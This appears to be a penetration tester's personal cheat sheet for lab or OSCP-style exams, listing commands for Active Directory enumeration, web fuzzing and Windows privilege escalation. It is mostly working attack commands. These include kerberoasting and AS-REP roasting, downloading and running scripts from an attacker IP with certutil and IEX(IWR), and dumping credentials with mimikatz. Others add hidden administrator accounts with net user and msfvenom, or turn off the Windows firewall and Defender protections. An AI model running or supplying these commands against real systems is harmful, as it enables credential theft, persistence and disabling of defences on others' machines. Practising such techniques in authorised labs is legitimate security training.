Powered by

IP:

Nmap TCP

Nmap UDP

Initial Checks:

export IP={IP}

nxc smb $IP -u '' -p '' --generate-hosts-file hosts nxc smb $IP -u '' -p '' --generate-krb5-file krb5.conf sudo ntpdate $IP nxc smb $IP -u '' -p '' nxc smb $IP -u 'guest' -p '' nxc ldap $IP -u 'guest' -p '' -M get-desc-users nxc ldap $IP -u '' -p '' -M get-desc-users

If any work go for:

--shares

-M gpp_password

-M gpp_autologin

-M powershell_history

-M keepass_discover

-M recyclebin

-M spider_plus --share 'SHARE_NAME'

--rid-brute | grep SidTypeUser | cut -d "\\" -f 2 | cut -d " " -f 1 | grep -v \\$ > users

--users-export users

nxc ldap $IP -u <u> -p <p> --asreproast asreproast.out

nxc ldap $IP -u <u> -p <p> --kerberoasting kerberoasting.out

nxc ldap $IP -u <u> -p <p> --no-preauth-targets users --kerberoasting output.txt

Creds found:

--shares

nxc ldap <ip> -u user -p pass --bloodhound --collection All --dns-server <IP_DC>

kerbrute userenum --dc 192.168.107.162 -d sub.poseidon.yzx /opt/SecLists/Usernames/xato-net-10-million-usernames.txt

impacket-GetNPUsers sub.poseidon.yzx/ -no-pass -usersfile users -dc-ip 192.168.107.162

GetUserSPNs.py -outputfile kerberoastables.txt -dc-ip 10.10.109.146 'oscp.exam/eric.wallows:EricLikesRunning800' -request

GetNPUsers.py -dc-ip 192.168.193.158 -dc-host zeus.corp 'zeus.corp/db_user:Password123!' -request

Initial Access

Ports Open:

80

Nikto:

Wappalyzer:

Source Code:

Directories Fuzzing

Cheatsheet:

===DIRECTORY FUZZING:
gobuster dir -u $URL -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt -k -t 30 --random-agent --exclude-length 6765

===DIRECTORY FUZZING:
ffuf -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ -recursion -recursion-depth 1 -e .php -v

===AUTHENTICATED FUZZING DIRECTORIES:
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt --hc 404 -d "SESSIONID=value" "$URL"

===FUZZ Directories:
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-large-directories.txt --hc 404 "$URL"

Also try: /opt/SecLists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt
/opt/SecLists/Discovery/Web-Content/common.txt

Result:

Files Fuzzing (add extensions)

Cheatsheet:

===AUTHENTICATED FILE FUZZING:
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-medium-files.txt --hc 404 -d "SESSIONID=value" "$URL"


===FILE FUZZING:
gobuster dir -u $URL -w /opt/SecLists/Discovery/Web-Content/raft-medium-files.txt -k -t 30 -x php,html,htm --random-agent --exclude-length 6765

Result:

ffuf -request ~/boxes/aoc/brute -request-proto http -w numbers

Privilege Escalation

Windows:

Penelope: run upload_privesc_scripts run upload_credump_scripts run ligolo

certutil.exe -urlcache -split -f http://<Our_IP>:8080/shell.bat shell.bat

.\mimikatz.exe "log" "privilege::debug" "token::elevate" "lsadump::lsa /inject" "sekurlsa::logonpasswords" exit

IEX(IWR http://192.168.45.212/PrivescCheck.ps1 -UseBasicParsing); Invoke-PrivescCheck

powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Risky -Report PrivescCheck_$($env:COMPUTERNAME) -Format TXT,HTML"

PS C:\Users\Public> . .\PowerUp.ps1; Invoke-AllChecks

winPEAS colors - REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1

(Get-PSReadlineOption).HistorySavePath C:\Users\[user]\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine

Unusual binaries on C:/Users/* ? transfer to kali and use strings

Don't forget to look for windows.old

Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue

Add admin:

net user itzvenom Password123! /add && net localgroup administrators itzvenom /add
msfvenom -p windows/exec CMD='net localgroup administrators yoshi /add' -f exe > command.exe
msfvenom -p windows/adduser USER=itzvenom PASS='P@ssw0rd!' -f exe > adduser.exe

runas /user:itzvenom cmd
Enter the password for itzvenom:
Attempting to start cmd as user "DEV04\itzvenom" ...
net user [username] [new password]

Disable firewall/AV:

netsh advfirewall set allprofiles state off
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False

Set-MpPreference -DisableRealtimeMonitoring $true;Set-MpPreference -DisableIOAVProtection $true;Set-MPPreference -DisableBehaviorMonitoring $true;Set-MPPreference -DisableBlockAtFirstSeen $true;Set-MPPreference -DisableEmailScanning $true;Set-MPPReference -DisableScriptScanning $true;Set-MpPreference -DisableIOAVProtection $true;Add-MpPreference -ExclusionPath "C:\Windows\Temp"

whoami; hostname; ipconfig; type C:\Users\Administrator\Desktop\proof.txt whoami; hostname; ipconfig; type C:\Users\Administrator\Desktop\local.txt

© Annsh